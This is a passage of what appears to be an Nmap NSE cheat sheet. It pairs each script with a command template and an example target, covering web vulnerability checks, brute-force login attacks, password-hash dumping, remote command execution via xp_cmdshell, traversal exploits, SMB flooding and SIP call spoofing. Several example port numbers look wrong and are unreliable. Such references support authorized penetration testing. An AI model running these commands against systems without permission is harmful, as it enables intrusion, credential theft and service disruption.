(nmap --script http-chrono -p80 vulnweb.com)

TO EXTRACT HTML, JAVASCRIPT COMMENTS FROM HTTP RESPONSE OF WEBSITE:

(nmap --script http-comments-displayer.nse -p+port +domain or ip of target) e.g.

(nmap --script http-comments-displayer.nse -p80 192.168.8.4)

TO CHECK BACKUP AND SWAP FILES OF CMS AND SERVER CONFIGURATION:

(nmap --script=http-config-backup -p+port +domain or ip of target) e.g.

(nmap --script=http-config-backup -p80 192.168.8.4)

TO CHECK THE CROSS-DOMAIN POLICY FILE (crossdomain.xml) AND CLIENT ACCESS POLICY FILE (clientaccesspolicy.xml) FOR OVERLY PERMISSIVE ENTRIES:

(nmap --script http-cross-domain-policy -p+port +domain or ip of target) e.g.

(nmap --script http-cross-domain-policy -p80 192.168.8.4)

TO CHECK CSRF VULNERABILITIES IN TARGET WEBSITE:

(nmap --script http-csrf.nse -p+port +domain or ip of target) e.g.

(nmap --script http-csrf.nse -p80 192.168.8.4)

TO DETECT A FIRMWARE BACKDOOR ON SOME D-LINK ROUTERS (THE ROUTER IS USUALLY REACHED BY ITS LAN ADDRESS):

(nmap -sV --script http-dlink-backdoor -p+port +domain or ip of target) e.g.

(nmap -sV --script http-dlink-backdoor -p80 192.168.8.4)

TO DISCOVER INSTALLED DRUPAL MODULES OR THEMES IN TARGET:

(nmap --script http-drupal-enum -p+port +domain or ip of target) e.g.

(nmap --script http-drupal-enum -p80 192.168.8.4)

TO DISCOVER DIRECTORIES USED BY WEBSITE AND SERVER:

(nmap -sV --script=http-enum -p+port +domain or ip of target) e.g.

(nmap -sV --script=http-enum -p80 vulnweb.com)

TO DETECT ERROR PAGES OF WEBSITE:           

(nmap --script http-errors.nse -p+port +domain or ip of target) e.g.

(nmap --script http-errors.nse -p80 192.168.8.4)

TO EXTRACT INTERESTING DATA HIDDEN IN IMAGE FILES OF WEB SERVER:

(nmap --script http-exif-spider -p+port +domain or ip of target) e.g.

(nmap --script http-exif-spider -p80 192.168.8.4)

TO FIND RSS OR ATOM FEEDS OF TARGET WEBSITE:

(nmap --script http-feed.nse -p+port +domain or ip of target) e.g.

(nmap --script http-feed.nse -p80 192.168.8.4)

TO FETCH FILES FROM SERVERS OF TARGET WESITE:

(nmap --script http-fetch -p+port +domain or ip of target) e.g.

(nmap --script http-fetch -p80 192.168.8.4)

TO EXPLOIT INSECURE FILE UPLOAD FORMS OF TARGET WEBSITE:

(nmap --script http-fileupload-exploiter.nse -p+port +domain or ip of target) e.g.

(nmap --script http-fileupload-exploiter.nse -p80 vulnweb.com)

TO PERFORM BRUTE FORCE ATTACK ON HTTP FORM BASED AUTHENTICATION OF TARGET WEBSITE:

(nmap --script http-form-brute -p+port +domain or ip of target) e.g.

(nmap --script http-form-brute -p80 vulnweb.com)

TO PERFORM FUZZING ON FORMS OF TARGET WEBSITE:

(nmap --script http-form-fuzzer -p+port +domain or ip of target) e.g.

(nmap --script http-form-fuzzer -p80 vulnweb.com)

TO GET LIST OF GIT PROJECTS OF TARGET WEBSITE:     

(nmap --script http-gitweb-projects-enum -p+port +domain or ip of target) e.g.

(nmap --script http-gitweb-projects-enum -p80 192.168.8.4)

TO DETECT HUAWEI HG5XX MODEMS VULNERABLE TO REMOTE CREDENTIAL AND INFORMATION DISCLOSURE:

(nmap --script http-huawei-hg5xx-vuln -p+port +domain or ip of target) e.g.

(nmap --script http-huawei-hg5xx-vuln -p80 192.168.8.4)

TO ENUMERATE 8.3 SHORT FILE NAMES ON IIS USING THE TILDE (~) DISCLOSURE:

(nmap --script http-iis-short-name-brute -p+port +domain or ip of target) e.g.

(nmap --script http-iis-short-name-brute -p80 192.168.8.4)

TO CHECK IIS 5.1 OR 6.0 WEBDAV FOR THE AUTHENTICATION BYPASS VULNERABILITY:

(nmap --script http-iis-webdav-vuln -p+port +domain or ip of target) e.g.

(nmap --script http-iis-webdav-vuln -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON JOOMLA CMS INSTALLATION:

(nmap -sV --script http-joomla-brute -p+port +domain or ip of target) e.g.

(nmap -sV --script http-joomla-brute -p80 192.168.8.4)

TO EXPLOIT THE NULL-BYTE POISONING VULNERABILITY IN LITESPEED WEB SERVER 4.0.X TO DOWNLOAD SOURCE CODE:

(nmap --script http-litespeed-sourcecode-download -p+port +domain or ip of target) e.g.

(nmap --script http-litespeed-sourcecode-download -p80 192.168.8.4)

TO LIST FILES FROM DIRECTORIES THAT HAVE DIRECTORY LISTING (INDEXING) ENABLED:

(nmap -n --script http-ls -p+port +domain or ip of target) e.g.

(nmap -n --script http-ls -p80 192.168.8.4)

TO EXPLOIT TRAVERSAL VULNERABLITY IN MAJORDOMO2 OF TARGET WEBSITE:

(nmap --script http-majordomo2-dir-traversal -p+port +domain or ip of target) e.g.

(nmap --script http-majordomo2-dir-traversal -p80 192.168.8.4)

TO BYPASS PASSWORD PROTECTED RESOURCES OF TARGET WEBSITE:

(nmap -sV --script http-method-tamper -p+port +domain or ip of target) e.g.

(nmap -sV --script http-method-tamper -p80 vulnweb.com)

TO FIND OPTIONS SUPPORTED BY HTTP SERVER OF TARGET WEBSITE:

(nmap --script http-methods -p+port +domain or ip of target) e.g.

(nmap --script http-methods -p80 192.168.8.4)

TO CHECK THE PRESENCE OF MOBILE VERSION IN TARGET WEBSITE:

(nmap --script http-mobileversion-checker.nse -p+port +domain or ip of target) e.g.

(nmap --script http-mobileversion-checker.nse -p80 192.168.8.4)

TO FIND INFORMATION FROM HTTP SERVER USING NTLM AUTHENTICATION:

(nmap --script http-ntlm-info -p+port +domain or ip of target) e.g.

(nmap --script http-ntlm-info -p80 192.168.8.4)

TO CHECK OPENING OF HTTP PROXY IN TARGET WEBSITE:

(nmap --script http-open-proxy.nse -p+port +domain or ip of target)  e.g.

(nmap --script http-open-proxy.nse -p8080 192.168.8.4)

TO FIND OPEN REDIRECTIONS OF TARGET WEBSITE:

(nmap --script=http-open-redirect -p+port +domain or ip of target) e.g.

(nmap --script=http-open-redirect -p80 vulnweb.com)

TO CHECK /ETC/PASSWD OR \BOOT.INI VULNERABILITY IN TARGET WEBSITE:

(nmap --script http-passwd -p+port +domain or ip of target) e.g.

(nmap --script http-passwd -p80 192.168.8.4)

TO CHECK PHP VERSION OF TARGET WEBSITE:

(nmap -sV --script=http-php-version -p+port +domain or ip of target) e.g.

(nmap -sV --script=http-php-version -p80 vulnweb.com)

TO EXPLOIT TRAVERSAL VULNERABILITY IN PHPMYADMIN DIRECTORY VERSION 2.6.4-PL1:

(nmap --script http-phpmyadmin-dir-traversal -p+port +domain or ip of target) e.g.

(nmap --script http-phpmyadmin-dir-traversal -p80 192.168.8.4)

TO FIND PHP FILES VULNERABLE TO REFLECTED CROSS SITE SCRIPTING THROUGH $_SERVER["PHP_SELF"]:

(nmap -sV --script http-phpself-xss -p+port +domain or ip of target) e.g.

(nmap -sV --script http-phpself-xss -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON HTTP PROXY SERVER OF TARGET WEBSITE:

(nmap --script http-proxy-brute -p+port +domain or ip of target) e.g.

(nmap --script http-proxy-brute -p8080 192.168.8.4)

TO GET INFORMATION FROM A QNAP NAS DEVICE OF TARGET:

(nmap --script http-qnap-nas-info -p+port +domain or ip of target) e.g.

(nmap --script http-qnap-nas-info -p80 192.168.8.4)

TO CHECK PRESENCE OF EXTERNAL JAVASCRIPT SCRIPTS IN TARGET WEBSITE:

(nmap --script http-referer-checker.nse -p+port +domain or ip of target) e.g.

(nmap --script http-referer-checker.nse -p80 192.168.8.4)

TO FIND OTHER HOSTNAMES SHARING THE TARGET'S IP ADDRESS (REVERSE IP LOOKUP THROUGH ROBTEX.COM; NEEDS INTERNET ACCESS AND A PUBLIC IP):

(nmap --script http-robtex-reverse-ip +public ip of target) e.g.

(nmap --script http-robtex-reverse-ip 203.0.113.10)

TO FIND DOMAINS THAT SHARE THE TARGET'S NAME SERVERS (THROUGH ROBTEX.COM):

(nmap --script http-robtex-shared-ns +domain of target) e.g.

(nmap --script http-robtex-shared-ns example.com)

TO TEST FOR THE SHELLSHOCK BASH VULNERABILITY THROUGH A CGI SCRIPT ON TARGET WEBSITE:

(nmap -sV --script http-shellshock --script-args http-shellshock.uri=+path of cgi script -p+port +domain or ip of target) e.g.

(nmap -sV --script http-shellshock --script-args http-shellshock.uri=/cgi-bin/test.cgi -p80 192.168.8.4)

TO SEE THE STRUCTURE OF DIRECTORIES OF WEBSITE AND TYPES OF FILES:

(nmap --script http-sitemap-generator -p+port +domain or ip of target) e.g.

(nmap --script http-sitemap-generator -p80 192.168.8.4)

TO CHECK SLOWLORIS DOS ATTACK VULNERABILITY IN TARGET WEBSITE:

 (nmap --script http-slowloris-check -p+port +domain or ip of target) e.g.

(nmap --script http-slowloris-check -p80 192.168.8.4)

TO CHECK SQL INJECTION VULNERABLE LINKS OF TARGET WEBSITE:

(nmap -sV --script=http-sql-injection -p+port +domain or ip of target) e.g.

(nmap -sV --script=http-sql-injection -p80 vulnweb.com)

TO CHECK STORED XSS VULNERABILITY IN TARGET WEBSITE:

(nmap --script http-stored-xss.nse -p+port +domain or ip of target) e.g.

(nmap --script http-stored-xss.nse -p80 192.168.8.4)

TO FIND USERS OF SUBVERSION REPOSITORY OF TARGET WEBSITE:

(nmap --script http-svn-enum -p+port +domain or ip of target) e.g.

(nmap --script http-svn-enum -p80 192.168.8.4)

TO GET INFORMATION OF SUBVERSION REPOSITORY OF TARGET WEBSITE

(nmap --script http-svn-info -p+port +domain or ip of target) e.g.

(nmap --script http-svn-info -p80 192.168.8.4)

TO SHOW THE TITLE OF THE DEFAULT PAGE OF TARGET WEBSITE:

(nmap --script http-title -p+port +domain or ip of target) e.g.

(nmap --script http-title -p80 192.168.8.4)

TO EXPLOIT THE DIRECTORY TRAVERSAL VULNERABILITY IN TP-LINK WIFI ROUTERS:

(nmap --script http-tplink-dir-traversal -p+port +domain or ip of target) e.g.

(nmap --script http-tplink-dir-traversal -p80 192.168.8.4)

TO CHECK WHETHER THE HTTP TRACE METHOD IS ENABLED:

(nmap --script http-trace -p+port +domain or ip of target) e.g.

(nmap --script http-trace -p80 192.168.8.4)

TO ENUMERATE VALID USERNAMES THROUGH APACHE mod_userdir (~user URLS):

(nmap -sV --script=http-userdir-enum -p+port +domain or ip of target) e.g.

(nmap -sV --script=http-userdir-enum -p80 vulnweb.com)

TO FIND VIRTUAL HOSTNAMES OF TARGET WEBSITE:

(nmap --script http-vhosts -p+port +domain or ip of target) e.g.

(nmap --script http-vhosts -p80 192.168.8.4)

TO LIST FILES THROUGH THE VLC STREAMER HELPER SERVICE OF TARGET (DEFAULT PORT 54340):

(nmap --script http-vlcstreamer-ls -p+port +domain or ip of target) e.g.

(nmap --script http-vlcstreamer-ls -p54340 192.168.8.4)

TO CHECK TRAVERSAL VULNERABILITY IN VMWARE OF TARGET WEBSITE:

(nmap --script http-vmware-path-vuln -p+port +domain or ip of target) e.g.

(nmap --script http-vmware-path-vuln -p80 192.168.8.4)

TO EXPLOIT THE FILE DISCLOSURE VULNERABILITY IN WEBMIN (CVE-2006-3392; WEBMIN LISTENS ON PORT 10000 BY DEFAULT):

(nmap -sV --script http-vuln-cve2006-3392 -p+port +domain or ip of target) e.g.

(nmap -sV --script http-vuln-cve2006-3392 -p10000 192.168.8.4)

TO EXPLOIT THE XML EXTERNAL ENTITY INJECTION IN ADOBE BLAZEDS (CVE-2009-3960):

(nmap --script=http-vuln-cve2009-3960 -p+port +domain or ip of target) e.g.

(nmap --script=http-vuln-cve2009-3960 -p80 192.168.8.4)

TO FIND THE JBOSS JMX CONSOLE AUTHENTICATION BYPASS (CVE-2010-0738; JBOSS USUALLY LISTENS ON PORT 8080):

(nmap --script=http-vuln-cve2010-0738 -p+port +domain or ip of target) e.g.

(nmap --script=http-vuln-cve2010-0738 -p8080 192.168.8.4)

TO GRAB THE ADMIN PASSWORD HASH FROM ADOBE COLDFUSION THROUGH DIRECTORY TRAVERSAL (CVE-2010-2861):

(nmap --script http-vuln-cve2010-2861 -p+port +domain or ip of target) e.g.

(nmap --script http-vuln-cve2010-2861 -p80 192.168.8.4)

TO DETECT DOS ATTACK VULNERABILITY IN TARGET APACHE SERVER:

(nmap --script http-vuln-cve2011-3192.nse -p+port +domain or ip of target) e.g.

(nmap --script http-vuln-cve2011-3192.nse -p80 192.168.8.4)

TO FIND THE REVERSE PROXY BYPASS VULNERABILITY IN APACHE HTTP SERVER (CVE-2011-3368):

(nmap --script http-vuln-cve2011-3368 -p+port +domain or ip of target) e.g.

(nmap --script http-vuln-cve2011-3368 -p80 192.168.8.4)

TO DETECT A PHP-CGI INSTALLATION VULNERABLE TO ARGUMENT INJECTION (CVE-2012-1823):

(nmap -sV --script http-vuln-cve2012-1823 -p+port +domain or ip of target) e.g.

(nmap -sV --script http-vuln-cve2012-1823 -p80 192.168.8.4)

TO DETECT A RUBY ON RAILS SERVER VULNERABLE TO OBJECT INJECTION (CVE-2013-0156):

(nmap -sV --script http-vuln-cve2013-0156 -p+port +domain or ip of target) e.g.

(nmap -sV --script http-vuln-cve2013-0156 -p80 192.168.8.4)

TO DETECT THE ASDM PRIVILEGE ESCALATION VULNERABILITY IN CISCO ASA (CVE-2014-2126; THE ASA WEB INTERFACE LISTENS ON PORT 443):

(nmap --script http-vuln-cve2014-2126 -p+port +domain or ip of target) e.g.

(nmap --script http-vuln-cve2014-2126 -p443 192.168.8.4)

TO DETECT THE SSL VPN PRIVILEGE ESCALATION VULNERABILITY IN CISCO ASA (CVE-2014-2127):

(nmap --script http-vuln-cve2014-2127 -p+port +domain or ip of target) e.g.

(nmap --script http-vuln-cve2014-2127 -p443 192.168.8.4)

TO DETECT THE SSL VPN AUTHENTICATION BYPASS VULNERABILITY IN CISCO ASA (CVE-2014-2128):

(nmap --script http-vuln-cve2014-2128 -p+port +domain or ip of target) e.g.

(nmap --script http-vuln-cve2014-2128 -p443 192.168.8.4)

TO DETECT THE SIP INSPECTION DENIAL OF SERVICE VULNERABILITY IN CISCO ASA (CVE-2014-2129):

(nmap --script http-vuln-cve2014-2129 -p+port +domain or ip of target) e.g.

(nmap --script http-vuln-cve2014-2129 -p443 192.168.8.4)

TO DETECT THE REMOTE CODE EXECUTION VULNERABILITY IN ELASTICSEARCH (CVE-2015-1427; ELASTICSEARCH LISTENS ON PORT 9200 BY DEFAULT):

(nmap --script=http-vuln-cve2015-1427 -p+port +domain or ip of target) e.g.

(nmap --script=http-vuln-cve2015-1427 -p9200 192.168.8.4)

TO DETECT THE HTTP.sys REMOTE CODE EXECUTION VULNERABILITY IN MS WINDOWS / IIS (CVE-2015-1635, MS15-034):

(nmap --script http-vuln-cve2015-1635 -p+port +domain or ip of target) e.g.

(nmap --script http-vuln-cve2015-1635 -p80 192.168.8.4)

TO DETECT ROMPAGER 4.07 MISFORTUNE COOKIE VULNERABILITY:

(nmap --script=http-vuln-misfortune-cookie -p+port +domain or ip of target) e.g.

(nmap --script=http-vuln-misfortune-cookie -p80 192.168.8.4)

TO DETECT FIREWALL OF TARGET:

(nmap --script http-waf-detect -p+port +domain or ip of target) e.g.

(nmap --script http-waf-detect -p80 192.168.8.4)

TO DETECT THE DETAIL OF FIREWALL OF TARGET WEBSITE:

(nmap --script=http-waf-fingerprint -p+port +domain or ip of target) e.g.

(nmap --script=http-waf-fingerprint -p8087 192.168.8.4)

Firewall of target website or ip

TO DETECT WEBDAV INSTALLATIONS ON TARGET WEBSITE:

(nmap --script http-webdav-scan -p+port +domain or ip of target) e.g.

(nmap --script http-webdav-scan -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON WORDPRESS CMS INSTALLATIONS OF TARGET WEB:

(nmap -sV --script http-wordpress-brute -p+port +domain or ip of target) e.g.

(nmap -sV --script http-wordpress-brute -p80 vulnweb.com)

TO GET INFORMATION OF WORDPRESS TARGET WEBSITE:

(nmap -sV --script http-wordpress-enum -p+port +domain or ip of target) e.g.

(nmap -sV --script http-wordpress-enum -p80 192.168.8.4)

TO GET USERNAMES OF TARGET WORDPRESS WEBSITE:

(nmap --script http-wordpress-users -p+port +domain or ip of target) e.g.

(nmap --script http-wordpress-users -p80 192.168.8.4)

TO SEARCH THE XSSED.COM DATABASES ON TARGET WEBSITE:

(nmap --script http-xssed.nse -p+port +domain or ip of target) e.g.

(nmap --script http-xssed.nse -p4550 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON IAX2 PROTOCOL:

(nmap -sU --script iax2-brute -p+port +domain or ip of target) e.g.

(nmap -sU --script iax2-brute -p4551 192.168.8.4)

TO DISCOVER THE INFORMATION OF IKE SERVICE ON TARGET WEBSITE:

(nmap -sU --script ike-version -p+port +domain or ip of target) e.g.

(nmap -sU --script ike-version -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON IMAP PROTOCOL:

(nmap --script imap-brute -p+port +domain or ip of target) e.g.

(nmap --script imap-brute -p4543 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON IBM INFORMIX DYNAMIC SERVER:

(nmap --script informix-brute -p+port +domain or ip of target) e.g.

(nmap --script informix-brute -p80 192.168.8.4)

TO DISCOVER THE LOCATION OF TARGET IP ADDRESS:

(nmap --script ip-geolocation-geoplugin -p+port +domain or ip of target) e.g.

(nmap --script ip-geolocation-geoplugin -p80 192.168.8.4)

TO CHECK IRC SERVERS FOR CHANNELS USED BY MALICIOUS BOTNETS:

(nmap --script=irc-botnet-channels -p+port +domain or ip of target) e.g.

(nmap --script=irc-botnet-channels -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON IRC SERVERS:

(nmap --script irc-brute -p+port +domain or ip of target) e.g.

(nmap --script irc-brute -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON IRC SERVERS THAT USE SASL AUTHENTICATION:

(nmap --script irc-sasl-brute -p+port +domain or ip of target) e.g.

(nmap --script irc-sasl-brute -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON ISCSI TARGETS:

(nmap -sV --script=iscsi-brute -p+port +domain or ip of target) e.g.

(nmap -sV --script=iscsi-brute -p80 192.168.8.4)

TO GET INFORMATION OF ISCSI TARGETS:

(nmap --script isns-info -p+port +domain or ip of target) e.g.

(nmap --script isns-info -p80 192.168.8.4)

TO DISCOVER KNX GATEWAY OF TARGET:

(nmap --script knx-gateway-discover -e interface + domain or ip of target) e.g.

(nmap --script knx-gateway-discover -e wlan0 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON LDAP AUTHENTICATION OF TARGET:

(nmap --script ldap-brute -p+port +domain or ip of target) e.g.

(nmap --script ldap-brute -p7890 192.168.8.4)

TO GET INFORMATION FROM MAX DB OF TARGET:

(nmap --script maxdb-info -p+port +domain or ip of target) e.g.

(nmap --script maxdb-info -p4567 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON COUCHBASE MEMBASE SERVER OF TARGET:

(nmap --script membase-brute -p+port +domain or ip of target) e.g.

(nmap --script membase-brute -p80 192.168.8.4)

TO GET INFORMATION FROM COUCHBASE WEB PORT OF TARGET:

(nmap --script membase-http-info -p+port +domain or ip of target) e.g.

(nmap --script membase-http-info -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON METASPLOIT PPC SERVER OF TARGET:

(nmap --script metasploit-xmlrpc-brute -p+port +domain or ip of target) e.g.

(nmap --script metasploit-xmlrpc-brute -p5555 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON MIKROTIK ROUTEROS DEVICES:

(nmap --script mikrotik-routeros-brute -p+port +domain or ip of target) e.g.

(nmap --script mikrotik-routeros-brute -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON RPA TECH MOBILE MOUSE SERVER OF TARGET:

(nmap --script mmouse-brute -p+port +domain or ip of target) e.g.

(nmap --script mmouse-brute -p1232 192.168.8.4)

TO GET TABLES OF DATABASE FROM MONGODB DATABASE OF TARGET:

(nmap --script mongodb-databases -p+port +domain or ip of target) e.g.

(nmap --script mongodb-databases -p80 192.168.8.4)

TO GET INFORMATION FROM MONGODB DATABASE SERVER OF TARGET:

(nmap --script mongodb-info -p+port +domain or ip of target) e.g.

(nmap --script mongodb-info -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON MS SQL SERVER OF TARGET:

(nmap --script ms-sql-brute -p+port +domain or ip of target) e.g.

(nmap --script ms-sql-brute -p365 192.168.8.4)

TO QUERY THE MICROSOFT SQL BROWSER SERVICE OF TARGET:

(nmap -sU --script ms-sql-dac -p+port +domain or ip of target) e.g.

(nmap -sU --script ms-sql-dac -p365 192.168.8.4)

TO GET HASHED PASSWORD FROM MS SQL SERVER OF TARGET:

(nmap --script ms-sql-dump-hashes -p+port +domain or ip of target) e.g.

(nmap --script ms-sql-dump-hashes -p365 192.168.8.4)

TO PERFORM ATTACK ON MS SQL SERVER OF TARGET USING EMPTY PASSWORD:

(nmap --script ms-sql-empty-password -p+port +domain or ip of target) e.g.

(nmap --script ms-sql-empty-password -p365 192.168.8.4)

TO GET INFORMATION FROM MS SQL SERVER OF TARGET:

(nmap --script ms-sql-info -p+port +domain or ip of target) e.g.

(nmap --script ms-sql-info -p365 192.168.8.4)

TO GET THE TABLES FROM EACH MS SQL DATABASE OF TARGET:

(nmap --script ms-sql-tables -p+port +domain or ip of target) e.g.

(nmap --script ms-sql-tables -p365 192.168.8.4)

TO RUN THE COMMANDS ON TARGET SYSTEM USING SHELL OF MS SQL SERVER:

(nmap --script ms-sql-xp-cmdshell -p+port +domain or ip of target) e.g.

(nmap --script ms-sql-xp-cmdshell -p365 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON MYSQL SERVICE:

(nmap --script=mysql-brute -p+port +domain or ip of target) e.g.

(nmap --script=mysql-brute -p365 192.168.8.4)

TO GET THE LIST OF ALL DATABASE FROM MYSQL SERVER OF TARGET:

(nmap -sV --script=mysql-databases -p+port +domain or ip of target) e.g.

(nmap -sV --script=mysql-databases -p365 192.168.8.4)

TO GET PASSWORD HASHES FROM MYSQL SERVER OF TARGET:

(nmap --script mysql-dump-hashes -p+port +domain or ip of target) e.g.

(nmap --script mysql-dump-hashes -p365 192.168.8.4)

TO FIND THE USERS OF MYSQL SERVER OF TARGET WITH EMPTY PASSWORD:

(nmap -sV --script=mysql-empty-password -p+port +domain or ip of target) e.g.

(nmap -sV --script=mysql-empty-password -p365 192.168.8.4)

TO FIND THE VALID USERS OF MYSQL SERVICE OF TARGET:

(nmap --script=mysql-enum -p+port +domain or ip of target) e.g.

(nmap --script=mysql-enum -p365 192.168.8.4)

TO GET THE LIST OF ALL USERS OF MYSQL SERVICE OF TARGET:

(nmap -sV --script=mysql-users -p+port +domain or ip of target) e.g.

(nmap -sV --script=mysql-users -p365 192.168.8.4)

TO GET THE LIST OF ALL VARIABLES OF MYSQL SERVER OF TARGET:

(nmap -sV --script=mysql-variables -p+port +domain or ip of target) e.g.

(nmap -sV --script=mysql-variables -p365 192.168.8.4)

TO FIND NETBUS AUTHENTICATION BYPASS VULNERABILITY IN TARGET:

(nmap --script netbus-auth-bypass -p+port +domain or ip of target) e.g.

(nmap --script netbus-auth-bypass -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON NETBUS OF TARGET:

(nmap --script netbus-brute -p+port +domain or ip of target) e.g.

(nmap --script netbus-brute -p80 192.168.8.4)

TO SEND FINS PACKET TO TARGET:

(nmap --script omron-info -p+port +domain or ip of target) e.g.

(nmap --script omron-info -p80 192.168.8.4)

TO GET INFORMATION OF OPENLOOKUP SERVER:

(nmap --script openlookup-info -p+port +domain or ip of target) e.g.

(nmap --script openlookup-info -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON OPENVAS OTP SERVICE OF TARGET:

(nmap -sV --script=openvas-otp-brute -p+port +domain or ip of target) e.g.

(nmap -sV --script=openvas-otp-brute -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON ORACLE SERVER:

(nmap --script oracle-brute -p+port +domain or ip of target) e.g.

(nmap --script oracle-brute -p80 192.168.8.4)

TO EXPLOIT CVE-2012-3137 VULNERABILITY IN ORACLE SERVER OF TARGET:

(nmap --script oracle-brute-stealth -p+port +domain or ip of target) e.g.

(nmap --script oracle-brute-stealth -p80 192.168.8.4)

TO GET THE VALID ORACLE USERS OF TARGET:

(nmap --script oracle-enum-users -p+port +domain or ip of target) e.g.

(nmap --script oracle-enum-users -p80 192.168.8.4)

TO DISCOVER PATH MTU OF TARGET:

(nmap --script path-mtu -p+port +domain or ip of target) e.g.

(nmap --script path-mtu -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON PC ANYWHERE PROTOCOL OF TARGET:

(nmap --script=pcanywhere-brute -p+port +domain or ip of target) e.g.

(nmap --script=pcanywhere-brute -p2345 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON POSTGRESQL SERVICE OF TARGET:

(nmap --script pgsql-brute -p+port +domain or ip of target) e.g.

(nmap --script pgsql-brute -p55555 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON POP3:

(nmap -sV --script=pop3-brute -p+port +domain or ip of target) e.g.

(nmap -sV --script=pop3-brute -p80 192.168.8.4)

TO GET THE SECURITY DETAILS OF RDP OF TARGET:

(nmap --script rdp-enum-encryption -p+port +domain or ip of target) e.g.

(nmap --script rdp-enum-encryption -p80 192.168.8.4)

TO CHECK MS12-020 RDP VULNERABILITY IN TARGET:

(nmap -sV --script=rdp-vuln-ms12-020 -p+port +domain or ip of target) e.g.

(nmap -sV --script=rdp-vuln-ms12-020 -p80 192.168.8.4)

TO CHECK REAL VNC AUTHENTICATION BYPASS VULNERABILITY IN TARGET:

(nmap -sV --script=realvnc-auth-bypass -p+port +domain or ip of target) e.g.

(nmap -sV --script=realvnc-auth-bypass -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON REDIS KEY VALUE STORE OF TARGET:

(nmap --script redis-brute -p+port +domain or ip of target) e.g.

(nmap --script redis-brute -p80 192.168.8.4)

TO GET INFORMATION FROM REDIS KEY VALUE STORE OF TARGET:

(nmap --script redis-info -p+port +domain or ip of target) e.g.

(nmap --script redis-info -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON UNIX REXEC SERVICE OF TARGET:

(nmap --script rexec-brute -p+port +domain or ip of target) e.g.

(nmap --script rexec-brute -p7856 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON UNIX RLOGIN SERVICE OF TARGET:

(nmap --script rlogin-brute -p+port +domain or ip of target) e.g.

(nmap --script rlogin-brute -p7856 192.168.8.4)

TO CONNECT TO REMOTE RMI REGISTRY OF TARGET:

(nmap --script rmi-dumpregistry -p+port +domain or ip of target) e.g.

(nmap --script rmi-dumpregistry -p80 192.168.8.4)

TO GET THE INFORMATION OF RPC PORT OF TARGET:

(nmap --script rpc-grind -p+port +domain or ip of target) e.g.

(nmap --script rpc-grind -p7899 192.168.8.4)

TO GET INFORMATION OF RPCAP SERVICE OF TARGET:

(nmap --script rpcap-info -p+port +domain or ip of target) e.g.

(nmap --script rpcap-info -p56 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON RSYNC PROTOCOL OF TARGET:

(nmap --script rsync-brute -p+port +domain or ip of target) e.g.

(nmap --script rsync-brute -p58 192.168.8.4)

TO GET THE LIST OF MODULES AVAILABLE FOR RSYNC:

(nmap --script rsync-list-modules -p+port +domain or ip of target) e.g.

(nmap --script rsync-list-modules -p58 192.168.8.4)

TO GET THE DETAIL RELATED TO RTSP FOR CAMERAS:

(nmap --script rtsp-methods -p+port +domain or ip of target) e.g.

(nmap --script rtsp-methods -p554 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON LINKS RELATED TO RTSP OF TARGET:

(nmap --script rtsp-url-brute -p+port +domain or ip of target ) e.g.

(nmap --script rtsp-url-brute -p554 192.168.8.4)

TO GET THE DETAIL OF S7 PLC DEVICES OF TARGET:

(nmap --script s7-info.nse -p+port +domain or ip of target) e.g.

(nmap --script s7-info.nse -p80 192.168.8.4)

TO CHECK SAMBA HEAP OVERFLOW VULNERABILITY IN TARGET:

(nmap --script=samba-vuln-cve-2012-1182 -p+port +domain or ip of target) e.g.

(nmap --script=samba-vuln-cve-2012-1182 -p53 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON SIP OF TARGET:

(nmap -sU --script=sip-brute -p+port +domain or ip of target) e.g.

(nmap -sU --script=sip-brute -p59 192.168.8.4)

TO SPOOF THE CALL ON SIP PHONE OF TARGET:

(nmap --script=sip-call-spoof -p+port +domain or ip of target) e.g.

(nmap --script=sip-call-spoof -p59 192.168.8.4)

TO DISCOVER THE VALID USERS OF SIP OF TARGET:

(nmap --script=sip-enum-users -p+port +domain or ip of target) e.g.

(nmap --script=sip-enum-users -p59 192.168.8.4)

TO FIND THE SIP METHODS OF SERVER OF TARGET:

(nmap --script=sip-methods -sU -p+port +domain or ip of target) e.g.

(nmap --script=sip-methods -sU -p59 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON SMB OF TARGET:

(nmap --script smb-brute.nse -p+port +domain or ip of target) e.g.

(nmap --script smb-brute.nse -p64 192.168.8.4)

TO FIND THE DOMAINS OF TARGET SYSTEM:

(nmap --script smb-enum-domains.nse -p+port +domain or ip of target) e.g.

(nmap --script smb-enum-domains.nse -p80 192.168.8.4)

TO FLOOD ON THE SMB OF TARGET:

(nmap --script smb-flood.nse -p+port +domain or ip of target) e.g.

(nmap --script smb-flood.nse -p64 192.168.8.4)

TO GET THE DETAIL OF FILES OF SMB OF TARGET:

(nmap --script smb-ls -p+port +domain or ip of target) e.g.

(nmap --script smb-ls -p64 192.168.8.4)

